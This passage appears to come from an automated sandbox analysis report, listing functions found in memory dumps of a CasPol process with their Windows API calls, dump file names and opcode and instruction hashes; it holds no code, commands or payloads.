                                                                                                    Function 00C03F6C, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00C051C1,00000800), ref: 00C05252
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5658708804.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c00000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: 55db9838db6d38a172be760c5b08c1c47914b6e80194d65a25ce662b17574e6e
                                                                                                    • Instruction ID: 1e53470f55da3282eb04b1f363ea9ed91234e325aebc9ef29e71ad2765751d68
                                                                                                    • Opcode Fuzzy Hash: 55db9838db6d38a172be760c5b08c1c47914b6e80194d65a25ce662b17574e6e
                                                                                                    • Instruction Fuzzy Hash: C611D6B59006499FCB10CFAAD444ADEFBF4AF89314F14842AD515A7240C375AA45CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0110C668, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0110C6CF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                    • String ID:
                                                                                                    • API String ID: 1890195054-0
                                                                                                    • Opcode ID: 9d078954fbd16a0e812263ae67dc68c123deab9c7ab84c0a260abe953ecf5f71
                                                                                                    • Instruction ID: c62aa51928a9f5e0e6255722911c778d2c41dcb70b9bc1afadd6b01c1576e72f
                                                                                                    • Opcode Fuzzy Hash: 9d078954fbd16a0e812263ae67dc68c123deab9c7ab84c0a260abe953ecf5f71
                                                                                                    • Instruction Fuzzy Hash: 1A1112B1C006199BCB10CFAAC944BDEFBF4AF89324F10856AD918A7240D778A944CFE5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DCE32BC, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 1DCE52B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5683699457.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dce0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 95315e089394953f933c978e8e7df71c59e77fb8b96ce063bfaf6a0ebc80d8d9
                                                                                                    • Instruction ID: 81f54d05499d576d983b007361f90fc817c179b698bf2250099bbadca9e8e822
                                                                                                    • Opcode Fuzzy Hash: 95315e089394953f933c978e8e7df71c59e77fb8b96ce063bfaf6a0ebc80d8d9
                                                                                                    • Instruction Fuzzy Hash: 7511F0B5C006498FCB10CFAAC844BDEFBF4AF89314F14882AD529B7200D375A545CFA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C42734, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,00C45D1F), ref: 00C45DBF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: a2d9174716a6f641907445a25857684f262b7b091ba7d463c2cfeb08dbfd7038
                                                                                                    • Instruction ID: f7122f20474ed2599d5080fccacbf0bf1df4507ac10c2d159d5b65146ddaa175
                                                                                                    • Opcode Fuzzy Hash: a2d9174716a6f641907445a25857684f262b7b091ba7d463c2cfeb08dbfd7038
                                                                                                    • Instruction Fuzzy Hash: 5A1128B5D006488FCB10CFAAC548BDEFBF8EF89314F10841AD519A7241D774A944CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C45D59, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,00C45D1F), ref: 00C45DBF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 1e8822cc1ff4e9eeb1e1d1fa78e5571e0939e0c636ba4730a45f8bf8bb7c3f59
                                                                                                    • Instruction ID: 0c2f9261a53a002960cc6bfea0dbc6d7c71164990715569e74ecc8ad5eadddab
                                                                                                    • Opcode Fuzzy Hash: 1e8822cc1ff4e9eeb1e1d1fa78e5571e0939e0c636ba4730a45f8bf8bb7c3f59
                                                                                                    • Instruction Fuzzy Hash: 931125B1D007488FCB10CFAAC548BDEFBF8AF89324F10885AD959A7211D774A944CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C428C4, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 00C4693D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: 0b1bbc17636d54ffbf3f18fcef2efce13c7e593fadee79de5ac65fd8a0425880
                                                                                                    • Instruction ID: b226cc0d4426f2763189637bc241464b9df5d7738a78f47d6beea14aca744559
                                                                                                    • Opcode Fuzzy Hash: 0b1bbc17636d54ffbf3f18fcef2efce13c7e593fadee79de5ac65fd8a0425880
                                                                                                    • Instruction Fuzzy Hash: AD1103B19006498FCB20CFAAD544BDEBBF4EB89324F10841AD559A7200D375AA44CBA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C468E0, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 00C4693D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: 5bb246c2b1dde3e32e5e605c4f0ff2b4c4ffbf3894a646a67f243f937630a482
                                                                                                    • Instruction ID: 9c1e5c875682f913b346c5746bd499fa7946737a99c386527c1a9fad1d1d38f1
                                                                                                    • Opcode Fuzzy Hash: 5bb246c2b1dde3e32e5e605c4f0ff2b4c4ffbf3894a646a67f243f937630a482
                                                                                                    • Instruction Fuzzy Hash: 931115B59007498FCB10CFAAD444BDEFBF4EF89324F14845AD559A7200D774A944CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C45DF4, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,00C45D1F), ref: 00C45DBF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 4ad12aa9310b607e21e7cdc4bfb013a9c332d73b4b86d0abc952230684246f02
                                                                                                    • Instruction ID: 0bb980b5c9c9103edf825219176527962ff61dc556e470a2d40935febcbd60b9
                                                                                                    • Opcode Fuzzy Hash: 4ad12aa9310b607e21e7cdc4bfb013a9c332d73b4b86d0abc952230684246f02
                                                                                                    • Instruction Fuzzy Hash: 43F02B738046408FC72157BE84583C9BFE4AF91314F28848BC059CB562D37D9645C752
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010FA576, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: j
                                                                                                    • API String ID: 0-2137352139
                                                                                                    • Opcode ID: 2c0f8b5e2f68d8a642b50217d07113319b8a41187bab1044bcaa5addfbe56099
                                                                                                    • Instruction ID: be355600c313714aca74b1f6ec31248aea91ce4ea2c3027897d7d1818a1540b6
                                                                                                    • Opcode Fuzzy Hash: 2c0f8b5e2f68d8a642b50217d07113319b8a41187bab1044bcaa5addfbe56099
                                                                                                    • Instruction Fuzzy Hash: C3214B3570C3854FDB1247748C192AE3FA1DF82614F0589FAD185CB6D3DA288C0B8392
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F4FD8, Relevance: .4, Instructions: 438COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f94a0d6c1a1ecc3356fb85be6536553e823e4e6f58037d2ee24aaaba005d755d
                                                                                                    • Instruction ID: c16d04ee19c2cc177521432276630635978ef331b212bb252f1c064ebaf44ee8
                                                                                                    • Opcode Fuzzy Hash: f94a0d6c1a1ecc3356fb85be6536553e823e4e6f58037d2ee24aaaba005d755d
                                                                                                    • Instruction Fuzzy Hash: FBE10930F000044BEF75866CCC9976D77E6DF86224F25487EE78AEB792DA25DC428792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F98C0, Relevance: .4, Instructions: 383COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 42c00c2337d51a54ec83cd2f6adfc3ed7695a2e3d6fea16931bf7567d2f25b18
                                                                                                    • Instruction ID: 0b0ec014e17587a54cfb09468b78ca732f3cec172e50d9a87f0e0a58dffd5634
                                                                                                    • Opcode Fuzzy Hash: 42c00c2337d51a54ec83cd2f6adfc3ed7695a2e3d6fea16931bf7567d2f25b18
                                                                                                    • Instruction Fuzzy Hash: F9E19130E0420A8BDF61CB6CC5857ADB7F1EB45318F1189AAE689DB752DB34DC45CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F984D, Relevance: .3, Instructions: 347COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3505d66908ec37a4e67cc62af1e57c0afb3f28166ed6d3ac076489c7f20ecaec
                                                                                                    • Instruction ID: 021701b9b80b5377ac037ce32c2f9c1c79ecab3b774d1f357f4bcdb3c6bf9056
                                                                                                    • Opcode Fuzzy Hash: 3505d66908ec37a4e67cc62af1e57c0afb3f28166ed6d3ac076489c7f20ecaec
                                                                                                    • Instruction Fuzzy Hash: E0C1A330E0420A8BDF62CB6CC5817ADB7F1EB45308F1589AAF689DB752D735DC858782
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F98BF, Relevance: .3, Instructions: 293COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f625d5d52d474accfb0caf76c9936a51dbe7f0b2aea69f69d6641b57fc22d078
                                                                                                    • Instruction ID: fce421323a7b880f912196c11fa54ae64820972ecd5e4307e3064742d158ff1e
                                                                                                    • Opcode Fuzzy Hash: f625d5d52d474accfb0caf76c9936a51dbe7f0b2aea69f69d6641b57fc22d078
                                                                                                    • Instruction Fuzzy Hash: F8B19E30E0410A8BEF61CB6CC5817ADB7F1EB45318F1189AAF689DB752D735DC818B82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010FA5E0, Relevance: .3, Instructions: 273COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6116fd66aaaa8ce8046438cb8323f7b43cb3f8ec6568770cd48be720e80f19e1
                                                                                                    • Instruction ID: 253fb7a14ea224899eaf17f30e15cdd4130e7c75496782ffbecc8f7100564d3d
                                                                                                    • Opcode Fuzzy Hash: 6116fd66aaaa8ce8046438cb8323f7b43cb3f8ec6568770cd48be720e80f19e1
                                                                                                    • Instruction Fuzzy Hash: A0A1B038B04215DFEB049B70C889B6E77B2EF84720F118968E6569B7E1DF359D02CB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010FAE38, Relevance: .2, Instructions: 240COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e5daabd54e60dfa56b5f79e57ddf4ffa66cb68a8435e10e5cada90ef8e6ade57
                                                                                                    • Instruction ID: 1aa0d601e5ec27f073d6fb28a035ab9c4faf82b49d9921fdb91a3ecde9e8d557
                                                                                                    • Opcode Fuzzy Hash: e5daabd54e60dfa56b5f79e57ddf4ffa66cb68a8435e10e5cada90ef8e6ade57
                                                                                                    • Instruction Fuzzy Hash: 2391E630B042408FEB118B68C44579DBBE2AF85304F28C5EEE6999F796D776C845CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F31E9, Relevance: .2, Instructions: 216COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d4a5b67f7ed23eb1048eafec04f173c88a1d7b4c46147abf9f149c24d1b63d3a
                                                                                                    • Instruction ID: e27ae3ccd70f368e69cf12a3a47323d967ed5eeee155f9f63cf29f091b3589d8
                                                                                                    • Opcode Fuzzy Hash: d4a5b67f7ed23eb1048eafec04f173c88a1d7b4c46147abf9f149c24d1b63d3a
                                                                                                    • Instruction Fuzzy Hash: 73515935F082101BFB656A78486677E6483AFC1720F59C47CE74AAF7D6CEA59C0583C2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F6D40, Relevance: .2, Instructions: 202COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cff45f7c8f10750a4b2dad62abb1b386e3a6dcdb177c35406b4ebf416eee5fdd
                                                                                                    • Instruction ID: ef3ffc0c69789046854dfa69fc2a13fae0abd2ae833f40f1e98f0f352ae389cb
                                                                                                    • Opcode Fuzzy Hash: cff45f7c8f10750a4b2dad62abb1b386e3a6dcdb177c35406b4ebf416eee5fdd
                                                                                                    • Instruction Fuzzy Hash: 9061F431B042148FC7259BB9C8556AE7BEAAF81300B0488AFD196C7A52CB76DD49C792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F1F60, Relevance: .2, Instructions: 198COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 38b8ea47fe6ab36227ebb9d4ccd38df385a3509151b1f45972356606f33826da
                                                                                                    • Instruction ID: 1ce4a9b38582151279d7d4727ee416f57016796fb24f9e31a98694aaaddf3ec6
                                                                                                    • Opcode Fuzzy Hash: 38b8ea47fe6ab36227ebb9d4ccd38df385a3509151b1f45972356606f33826da
                                                                                                    • Instruction Fuzzy Hash: 8161B574F002189BEF549BB888147AEBAB6EFC8344F10846DD245DB395DF749C058B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F2968, Relevance: .2, Instructions: 171COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f849745ac8577c2a9d008f2d7753452ea626e5f7e51000aad79dc16581eaa345
                                                                                                    • Instruction ID: 93a6433700bb2856838a6bf1371ea728a7f61233291f7b867ab7c3917faac734
                                                                                                    • Opcode Fuzzy Hash: f849745ac8577c2a9d008f2d7753452ea626e5f7e51000aad79dc16581eaa345
                                                                                                    • Instruction Fuzzy Hash: B8518031A006098FDB21CFA9C8826AFBBF6EB84304F108D6ED695D7A51D730E845CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F9E50, Relevance: .2, Instructions: 158COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e18bb01994d090a7779cc25b5bb0d988464dba8c4af999a809f944d616787e59
                                                                                                    • Instruction ID: 1cb1114aa52615827dcb9dcef39eeae543b986e4f8ba4cce2fb39a652c07b7c9
                                                                                                    • Opcode Fuzzy Hash: e18bb01994d090a7779cc25b5bb0d988464dba8c4af999a809f944d616787e59
                                                                                                    • Instruction Fuzzy Hash: DE51B438B002088FCB14EBB8D8856AE77F2AFC4754B258C69E506DB355DF35EC058B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F6F68, Relevance: .2, Instructions: 157COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 88bd989afbdee9bda34c61607fb58137d7a2aebfb3ad30c1447839744dcc3de6
                                                                                                    • Instruction ID: ce57d3655c2d38c7438bf8ac3bb1d8592b08904810f228151982dfc0ed9476fa
                                                                                                    • Opcode Fuzzy Hash: 88bd989afbdee9bda34c61607fb58137d7a2aebfb3ad30c1447839744dcc3de6
                                                                                                    • Instruction Fuzzy Hash: C251D334B042208FDB1A9BB4C8A47AE77E6EFC5200F09446DEA06CB755DF789D0587D2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F7CF4, Relevance: .1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 970a4af6f9dd6479e1b3c864a9a1a32e5fccc1b4feb9106332f012754588b80b
                                                                                                    • Instruction ID: 44827766abfb4519a0dbcd4f5e6d8276b63bff31c5d562833a9bb401c4458e77
                                                                                                    • Opcode Fuzzy Hash: 970a4af6f9dd6479e1b3c864a9a1a32e5fccc1b4feb9106332f012754588b80b
                                                                                                    • Instruction Fuzzy Hash: D5411531B042099FEB169BB8C4553AD7BF2AF85300F1484AEE245DB6C2DB388C05CB63
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F1F5F, Relevance: .1, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0601a79aec363687b1459be5bfffa80c392142ba7bc707a29d6d6d7280ed8b0
                                                                                                    • Instruction ID: 5f5f123cffd60be7f1e1d9ad7f24e198a1baadd77a22b7affa81701ebcf67960
                                                                                                    • Opcode Fuzzy Hash: a0601a79aec363687b1459be5bfffa80c392142ba7bc707a29d6d6d7280ed8b0
                                                                                                    • Instruction Fuzzy Hash: 5B41A474B001089BEB555BB8C81476E7AF7AFC8344F11882DD246EB3D5DF749C058B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F96A7, Relevance: .1, Instructions: 108COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bef5832d875aebe0d638af19a00118631a8901480f038562f60846fed37d8d5f
                                                                                                    • Instruction ID: 5560022721b0313f74a9a06d2f78e9a83c18fa94ac599f95eeedded7f5ea26a6
                                                                                                    • Opcode Fuzzy Hash: bef5832d875aebe0d638af19a00118631a8901480f038562f60846fed37d8d5f
                                                                                                    • Instruction Fuzzy Hash: EE31E634F083559FDB019FB988497AE7FF1AB88644F1584AAEA44DB392EA348C01C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F7BD0, Relevance: .1, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 03ef5df98ed589dd1ca77a645bea5b6072f4e8b72bbd33bcfe8b0851362ac810
                                                                                                    • Instruction ID: 85004acca02e0aff8da938c9c681971ba3756edc4a15c1c971b40e23ba8bfa42
                                                                                                    • Opcode Fuzzy Hash: 03ef5df98ed589dd1ca77a645bea5b6072f4e8b72bbd33bcfe8b0851362ac810
                                                                                                    • Instruction Fuzzy Hash: C6311230B002189BEB189BB5C8553EDBAF6AF85304F04887DE205AB7C4DF784C44CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F7A65, Relevance: .1, Instructions: 105COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9a3cfb49e3df94b28fe779f48fd34e52175a4d267a3e40f18a10c399190bf69f
                                                                                                    • Instruction ID: cbf6b4830af83dcd29bfe8c8f3d8d23348de7917ddff9b929a9276dd2de41a86
                                                                                                    • Opcode Fuzzy Hash: 9a3cfb49e3df94b28fe779f48fd34e52175a4d267a3e40f18a10c399190bf69f
                                                                                                    • Instruction Fuzzy Hash: 5E31D531A0A2498FCB068FA4D8567DC7FB1AF46310F1945EAD381DB693D6748D09C762
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F671F, Relevance: .1, Instructions: 97COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 901c4fa72b487479de6d637c23692d7b77ae8687ba1e24a56bd5ccbd0cad4445
